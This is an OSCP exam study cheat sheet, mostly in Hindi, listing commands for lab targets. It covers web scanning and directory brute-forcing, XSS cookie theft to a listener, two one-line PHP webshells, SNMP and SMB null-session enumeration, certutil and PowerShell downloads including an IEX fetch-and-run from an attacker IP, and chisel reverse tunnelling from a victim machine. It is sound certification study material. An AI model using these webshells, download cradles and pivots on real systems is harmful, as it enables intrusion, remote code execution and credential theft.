
OSCP अध्ययन मार्गदर्शिका
Nikto स्कैनिंग:
nikto -h http://10.10.10.1
विभिन्न टूल्स के साथ डायरेक्ट्री बस्टिंग:
DIRB
dirb http://10.10.10.1
Gobuster
gobuster dir -u http://10.129.155.74:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx
XSS पेलोड्स: चीटशीट: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
netcat लिसनर या python वेब सर्वर के साथ बेसिक XSS फॉर्म टेस्टिंग
बेस64 कुकीज़ डंप करने के लिए क्रॉस साइट स्क्रिप्टिंग। burp में ctrl + u के साथ URL एन्कोड करना सुनिश्चित करें
संदर्भ: https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html
कमांड निष्पादन के लिए सरल PHP वेबशेल
<?php system($_REQUEST ['cmd']) ?>
<?php system($_GET['cmd']); ?>
पोर्ट 161 UDP
snmpwalk -c public -v2c 10.129.213.210
snmp-check 10.129.213.210
crackmapexec smb 10.129.70.254
खुले anonymous शेयरों का पता लगाएं
smbclient -L //10.129.70.254
नल प्रमाणीकरण
smbclient -N -L //10.129.70.254
Certutil:
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
PowerShell:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.11.0.4/nc.exe')"
Chisel का उपयोग करना:
पोर्ट फ़ॉरवर्डिंग का उपयोग करने का उदाहरण ताकि पोर्ट 910 काली बॉक्स पर उपलब्ध हो
on victim machine setup port forwarding
chisel.exe client 10.10.16.10:5555 R:910:127.0.0.1:910
On Kali attack box setup a reverse listner for port forward with chisel
./chisel server --port 5555 --reverse